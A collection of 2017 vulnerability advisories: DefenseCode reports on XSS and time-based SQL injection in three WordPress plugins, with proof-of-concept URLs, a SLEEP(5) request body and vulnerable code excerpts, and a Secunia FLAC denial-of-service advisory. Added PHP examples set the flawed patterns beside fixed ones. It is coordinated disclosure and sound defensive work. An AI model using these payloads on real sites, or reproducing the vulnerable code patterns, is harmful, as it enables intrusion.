DefenseCode ThunderScan SAST Advisory: WordPress All In One Schema.org Rich Snippets Plugin Security Vulnerability

 DefenseCode ThunderScan SAST Advisory
      WordPress All In One Schema.org Rich Snippets Plugin
                      Security Vulnerability


Advisory ID:    DC-2017-01-002
Advisory Title: WordPress All In One Schema.org Rich Snippets Plugin
                Security Vulnerability
Advisory URL:   http://www.defensecode.com/advisories.php
Software:       WordPress All In One Schema.org Rich Snippets Plugin
Language:       PHP
Version:        1.4.1 and below
Vendor Status:  Vendor contacted, update released
Release Date:   2017/05/24
Risk:           Medium



1. General Overview
===================
During the security audit of the All In One Schema.org Rich Snippets
plugin for WordPress CMS, a security vulnerability was discovered using
the DefenseCode ThunderScan application source code security analysis
platform.

More information about ThunderScan is available at URL:
http://www.defensecode.com


2. Software Overview
====================
According to the developers, All In One Schema.org Rich Snippets is a
WordPress plugin that is made to boost CTR, improve SEO and rankings,
and support most of the content type. The authors claim it works
perfectly with Google, Bing, Yahoo & Facebook.

According to wordpress.org, it has more than 50,000 active installs.

Homepage:
https://wordpress.org/plugins/all-in-one-schemaorg-rich-snippets/
https://www.brainstormforce.com/


3. Vulnerability Description
==================================
During the security analysis, ThunderScan discovered a Cross-Site
Scripting vulnerability in the All In One Schema.org Rich Snippets
WordPress plugin.

The Cross-Site Scripting vulnerability can enable the attacker to
construct a URL that contains malicious JavaScript code. If the
administrator of the site makes a request to such a URL, the
attacker's code will be executed, with unrestricted access to the
WordPress site in question. The attacker can entice the administrator
to visit the URL in various ways, including sending the URL by email,
posting it as a part of the comment on the vulnerable site or another
forum.

3.1 Cross-Site Scripting
  Vulnerable Function:    echo()
  Vulnerable Variable:    $_GET['bsf_send_label']
  Vulnerable URL:
http://vulnerablesite.com/wp-admin/admin.php?page=rich_snippet_dashboard&bsf_force_send=true&bsf_send_label=<%2Fscript><script>alert(1)<%2Fscript>
  File:                    all-in-one-schemaorg-rich-snippets\init.php
  ---------
    466    $label = $_GET['bsf_send_label'];
    ...
    471    $('td.savesend input').val('<?php echo $label; ?>');
  ---------


4. Solution
===========
Vendor resolved the security issues after we reported the
vulnerability. All users are strongly advised to update WordPress All
In One Schema.org Rich Snippets plugin to the latest available version.


5. Credits
==========
Discovered with DefenseCode ThunderScan Source Code Security Analyzer
by Neven Biruski.


6. Disclosure Timeline
======================
2017/03/28    Vendor contacted
2017/03/29    Vendor responded
2017/05/24    Advisory released to the public


7. About DefenseCode
====================
DefenseCode L.L.C. delivers products and services designed to analyze
and test web, desktop and mobile applications for security
vulnerabilities.

DefenseCode ThunderScan is a SAST (Static Application Security
Testing, WhiteBox Testing) solution for performing extensive security
audits of application source code. ThunderScan SAST performs fast and
accurate analyses of large and complex source code projects delivering
precise results and low false positive rate.

DefenseCode WebScanner is a DAST (Dynamic Application Security
Testing, BlackBox Testing) solution for comprehensive security audits
of active web applications. WebScanner will test a website's security
by carrying out a large number of attacks using the most advanced
techniques, just as a real attacker would.

Subscribe for free software trial on our website
http://www.defensecode.com/ .

E-mail: defensecode[at]defensecode.com

Website: http://www.defensecode.com
Twitter: https://twitter.com/DefenseCode/

DefenseCode ThunderScan SAST Advisory: WordPress Huge-IT Video Gallery Plugin Security Vulnerability

DefenseCode ThunderScan SAST Advisory
           WordPress Huge-IT Video Gallery Plugin
                   Security Vulnerability


Advisory ID:    DC-2017-01-009
Advisory Title: WordPress Huge-IT Video Gallery plugin SQL injection
                vulnerability
Advisory URL:   http://www.defensecode.com/advisories.php
Software:       WordPress Huge-IT Video Gallery plugin
Language:       PHP
Version:        2.0.4 and below
Vendor Status:  Vendor contacted, update released
Release Date:   2017/05/24
Risk:           High



1. General Overview
===================
During the security audit of the Huge-IT Video Gallery plugin for
WordPress CMS, a security vulnerability was discovered using the
DefenseCode ThunderScan application source code security analysis
platform.

More information about ThunderScan is available at URL:
http://www.defensecode.com


2. Software Overview
====================
According to the developers, Gallery Video plugin was created and
specifically designed to show video links in unusual splendid gallery
types supplemented of many gallery options.

According to wordpress.org, it has more than 40,000 active installs.

Homepage:
https://wordpress.org/plugins/gallery-video/
http://huge-it.com/wordpress-video-gallery/


3. Vulnerability Description
==================================
During the security analysis, ThunderScan discovered an SQL injection
vulnerability in the Huge-IT Video Gallery WordPress plugin.

The easiest way to reproduce the vulnerability is to visit the
provided URL while being logged in as administrator or another user
that is authorized to access the plugin settings page. Users that do
not have full administrative privileges could abuse the database
access the vulnerability provides to either escalate their privileges
or obtain and modify database contents they were not supposed to be
able to.

Due to the missing nonce token, the vulnerable code is also directly
exposed to attack vectors such as Cross-Site Request Forgery (CSRF).

3.1 SQL injection
  Vulnerable Function:    $wpdb->get_var( $query );
  Vulnerable Variable:    $_POST['cat_search']
  Vulnerable URL:
http://www.vulnerablesite.com/wp-admin/admin.php?page=video_galleries_huge_it_video_gallery
  Vulnerable Body:        cat_search=DefenseCode AND (SELECT * FROM
(SELECT(SLEEP(5)))DC)
  File:
gallery-video\includes\admin\class-gallery-video-galleries.php
    ---------
    107    $cat_id = sanitize_text_field( $_POST['cat_search'] );
    ...
    118       $where .= " AND sl_width=" . $cat_id;
    ...
    127    $query = "SELECT COUNT(*) FROM " . $wpdb->prefix . "huge_it_videogallery_galleries" . $where;
    128    $total = $wpdb->get_var( $query );
    ---------
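
The pattern in the excerpt above next to a parameterized alternative, as an added example that is not part of the advisory or the plugin's code. The in-memory SQLite table, its rows, the base WHERE clause and the function names are constructed for illustration (the pdo_sqlite extension is assumed), and `text_field_stand_in()` only approximates WordPress's `sanitize_text_field()`.

```php
<?php
// Added example, not the plugin's code. Table and column names come from the
// excerpt; rows, function names and the base WHERE clause are constructed.

// Rough stand-in for sanitize_text_field(): strips tags and extra whitespace.
// Neither it nor the real function quotes or escapes anything for SQL.
function text_field_stand_in(string $s): string
{
    return trim(preg_replace('/\s+/', ' ', strip_tags($s)));
}

// "Before": the excerpt's pattern, value concatenated into a numeric position.
function build_query_vulnerable(string $posted): string
{
    $cat_id = text_field_stand_in($posted);
    $where  = " WHERE 1=1";                      // constructed base clause
    $where .= " AND sl_width=" . $cat_id;
    return "SELECT COUNT(*) FROM huge_it_videogallery_galleries" . $where;
}

// "After": accept only a short run of digits and bind it as an integer.
// In WordPress the same idea is $wpdb->prepare( ' AND sl_width = %d', $cat_id ).
function count_galleries(PDO $db, string $posted): int
{
    if (!preg_match('/\A[0-9]{1,9}\z/', $posted)) {
        throw new InvalidArgumentException('cat_search must be an integer');
    }
    $stmt = $db->prepare(
        'SELECT COUNT(*) FROM huge_it_videogallery_galleries WHERE sl_width = :w'
    );
    $stmt->bindValue(':w', (int) $posted, PDO::PARAM_INT);
    $stmt->execute();
    return (int) $stmt->fetchColumn();
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE huge_it_videogallery_galleries (id INTEGER PRIMARY KEY, sl_width INTEGER)');
$db->exec('INSERT INTO huge_it_videogallery_galleries (sl_width) VALUES (300), (300), (640)');

// Request body value quoted in the advisory.
$posted = 'DefenseCode AND (SELECT * FROM (SELECT(SLEEP(5)))DC)';

// The text filter passes the value through unchanged, so the subquery becomes
// part of the statement. The string is only printed here, never executed.
echo build_query_vulnerable($posted), PHP_EOL;

echo 'rows with sl_width=300: ', count_galleries($db, '300'), PHP_EOL;

try {
    count_galleries($db, $posted);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}
```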


4. Solution
===========
Vendor resolved the security issues. All users are strongly advised to
update WordPress Huge-IT Video Gallery plugin to the latest available
version.


5. Credits
==========
Discovered with DefenseCode ThunderScan Source Code Security Analyzer
by Neven Biruski.


6. Disclosure Timeline
======================
2017/03/31    Vendor contacted
2017/04/06    Vendor responded
2017/05/24    Advisory released to the public



DefenseCode ThunderScan SAST Advisory: WordPress AffiliateWP Plugin Security Vulnerability

  DefenseCode ThunderScan SAST Advisory
              WordPress AffiliateWP Plugin
                Security Vulnerability


Advisory ID:    DC-2017-05-05
Advisory Title: WordPress AffiliateWP Plugin Security Vulnerability
Advisory URL:   http://www.defensecode.com/advisories.php
Software:       WordPress AffiliateWP Plugin
Language:       PHP
Version:        2.0.8 and below (taken from the official GitHub repo)
Vendor Status:  Vendor contacted, update released
Release Date:   2017/05/24
Risk:           Medium



1. General Overview
===================
During the security audit of the AffiliateWP plugin for WordPress CMS,
a security vulnerability was discovered using the DefenseCode
ThunderScan application source code security analysis platform.

More information about ThunderScan is available at URL:
http://www.defensecode.com


2. Software Overview
====================
According to the plugin developers, AffiliateWP is an easy-to-use,
reliable WordPress plugin that gives you the affiliate marketing tools
you need to grow your business and make more money. In 2016 it
surpassed $500,000 in annual revenue:
 https://pippinsplugins.com/2016-in-review/

Homepage:
 https://affiliatewp.com
 https://github.com/AffiliateWP/AffiliateWP


3. Vulnerability Description
==================================
During the security analysis, ThunderScan discovered a Cross-Site
Scripting vulnerability in the AffiliateWP WordPress plugin.

The Cross-Site Scripting vulnerability can enable the attacker to
construct a URL that contains malicious JavaScript code. If the
administrator of the site makes a request to such a URL, the
attacker's code will be executed, with unrestricted access to the
WordPress site in question. The attacker can entice the administrator
to visit the URL in various ways, including sending the URL by email,
posting it as a part of the comment on the vulnerable site or another
forum.

3.1 Cross-Site Scripting
  Vulnerable Function:    echo
  Vulnerable Variable:    $_REQUEST['filter_from']
  Vulnerable URL:
http://vulnerablesite.com//wp-admin/admin.php?page=affiliate-wp-referrals&filter_from=%27%3C%2Fscript%3E%3Cscript%3Ealert%2842%29%3C%2Fscript%3E
  File:
AffiliateWP-master\includes\admin\referrals\class-list-table.php
  ---------
  571 $from = ! empty( $_REQUEST['filter_from'] ) ? $_REQUEST['filter_from'] : '';
  ...
  574 echo "<input type='text' class='affwp-datepicker' autocomplete='off' name='filter_from' placeholder='" . __( 'From - mm/dd/yyyy', 'affiliate-wp' ) . "' value='" . $from . "'/>";
  ---------
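
Output encoding for the two sinks on this page, the HTML attribute in the excerpt above and the JavaScript string in the Rich Snippets advisory earlier, as an added example that is not code from either plugin or advisory. The function names are made up, the sinks are reduced from the quoted excerpts, and the WordPress helpers named in the comments are the platform's usual counterparts, not necessarily what the vendors shipped.

```php
<?php
// Added example, not code from either plugin. Function names are made up; the
// two sinks are reduced from the excerpts quoted in the advisories.

// Sink 1 (init.php, line 471): the value lands inside a single-quoted
// JavaScript string, which itself sits inside a <script> element.
function js_sink_vulnerable(string $label): string
{
    return "$('td.savesend input').val('" . $label . "');";
}

// json_encode() emits a complete, quoted JS string literal. The JSON_HEX_*
// flags turn < > & ' " into \uXXXX escapes, so neither "</script>" nor a quote
// survives. WordPress equivalents: wp_json_encode(), or esc_js() inside quotes.
function js_sink_hardened(string $label): string
{
    $flags = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT
           | JSON_INVALID_UTF8_SUBSTITUTE;
    return "$('td.savesend input').val(" . json_encode($label, $flags) . ");";
}

// Wrong encoder for this context: HTML-escaping removes the tags and quotes,
// but a trailing backslash still escapes the closing quote of the JS string.
function js_sink_html_escaped(string $label): string
{
    return "$('td.savesend input').val('" . htmlspecialchars($label, ENT_QUOTES) . "');";
}

// Sink 2 (class-list-table.php, line 574): a single-quoted HTML attribute.
function attr_sink_vulnerable(string $from): string
{
    return "<input type='text' name='filter_from' value='" . $from . "'/>";
}

// ENT_QUOTES is what matters here: the attribute is delimited by ', which
// htmlspecialchars() left alone by default before PHP 8.1. WordPress: esc_attr().
function attr_sink_hardened(string $from): string
{
    $safe = htmlspecialchars($from, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return "<input type='text' name='filter_from' value='" . $safe . "'/>";
}

// Parameter values from the advisories' URLs, percent-decoded.
$label = '</script><script>alert(1)</script>';
$from  = "'</script><script>alert(42)</script>";

foreach ([
    'js, raw'          => js_sink_vulnerable($label),
    'js, json_encode'  => js_sink_hardened($label),
    'js, html-escaped' => js_sink_html_escaped('abc\\'),   // constructed input
    'attr, raw'        => attr_sink_vulnerable($from),
    'attr, escaped'    => attr_sink_hardened($from),
] as $case => $out) {
    $raw_tag = stripos($out, '<script') !== false ? 'yes' : 'no';
    printf("%-17s raw <script> in output: %-3s  %s\n", $case, $raw_tag, $out);
}
```

The `js, html-escaped` row contains no tag, yet its string literal is no longer closed, which is why the encoder has to match the output context rather than the input.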


4. Solution
===========
Vendor resolved the security issues after we reported the
vulnerability. All users are strongly advised to update WordPress
AffiliateWP plugin to the latest available version.


5. Credits
==========
Discovered with DefenseCode ThunderScan Source Code Security Analyzer
by Neven Biruski.


6. Disclosure Timeline
======================
2017/05/16    Vendor contacted
2017/05/16    Vendor responded
2017/05/17    Update released
2017/05/24    Advisory released to the public



Wednesday, May 17, 2017

Secunia Research: FLAC "read_metadata_vorbiscomment_()" Memory Leak Denial of Service Vulnerability

======================================================================

                    Secunia Research 2017/05/11

        FLAC "read_metadata_vorbiscomment_()" Memory Leak
                 Denial of Service Vulnerability

======================================================================
Table of Contents

Affected Software....................................................1
Severity.............................................................2
Description of Vulnerability.........................................3
Solution.............................................................4
Time Table...........................................................5
Credits..............................................................6
References...........................................................7
About Flexera Software...............................................8
Verification.........................................................9

======================================================================
1) Affected Software

* FLAC version 1.3.2. Other versions may also be affected.

======================================================================
2) Severity

Rating: Moderately critical
Impact: Denial of Service
Where:  From remote

======================================================================
3) Description of Vulnerability

Secunia Research has discovered a vulnerability in FLAC, which can be
exploited by malicious people to cause a DoS (Denial of Service).

The vulnerability is caused due to an error in the
"read_metadata_vorbiscomment_()" function (stream_decoder.c), which
can be exploited to cause a memory leak via a specially crafted FLAC
file.

The vulnerability is confirmed in version 1.3.2. Other versions may
also be affected.

======================================================================
4) Solution

Fixed in the source code repository.

======================================================================
5) Time Table

2017/04/06 - Initial contact to request security contact.
2017/04/06 - Maintainer responds with security contact.
2017/04/06 - Maintainer contacted with the vulnerability details.
2017/04/08 - Maintainer provides a patch in the official source
             code repository.
2017/04/21 - Release of Secunia Advisory SA76102.
2017/05/11 - Public disclosure of Secunia Research Advisory.

======================================================================
6) Credits

Discovered by Jakub Jirasek, Secunia Research at Flexera Software.

======================================================================
7) References

The Flexera Software CNA has assigned the CVE-2017-6888 identifier
for the vulnerability through the Common Vulnerabilities and Exposures
(CVE) project.

======================================================================
8) About Flexera Software

Flexera Software helps application producers and enterprises increase
application usage and the value they derive from their software.

http://www.flexerasoftware.com/enterprise/company/about/

Flexera Software  delivers  market-leading  Software  Vulnerability
Management solutions enabling enterprises to proactively identify and
remediate software vulnerabilities, effectively reducing the risk of
costly security breaches.

http://www.flexerasoftware.com/enterprise/products/

Flexera  Software  supports  and  contributes  to  the community in
several ways.  We have always believed that reliable vulnerability
intelligence and tools to aid identifying and fixing vulnerabilities
should be  freely available  for  consumers  to ensure that users,
who care about their online privacy and security, can stay secure.
Only a few vendors address vulnerabilities in a proper way and help
users get updated  and  stay secure.  End-users (whether private
individuals or businesses) are otherwise left largely alone,  and
that is why back in 2002, Secunia Research started investigating,
coordinating  disclosure  and  verifying software vulnerabilities.
In  2016,  Secunia Research  became  a  part  of  Flexera Software
and today our in-house software vulnerability research remains the
core  of  the  Software  Vulnerability  Management  products  at
Flexera Software.

http://secunia.com/secunia_research/

The  public  Advisory database  contains sufficient information  for
researchers, security enthusiasts, and consumers to lookup individual
products and vulnerabilities  and  assess, whether they need to take
any actions to secure their systems or whether a given vulnerability
has already been discovered

http://secunia.com/advisories/

======================================================================
9) Verification

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2017-7/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

======================================================================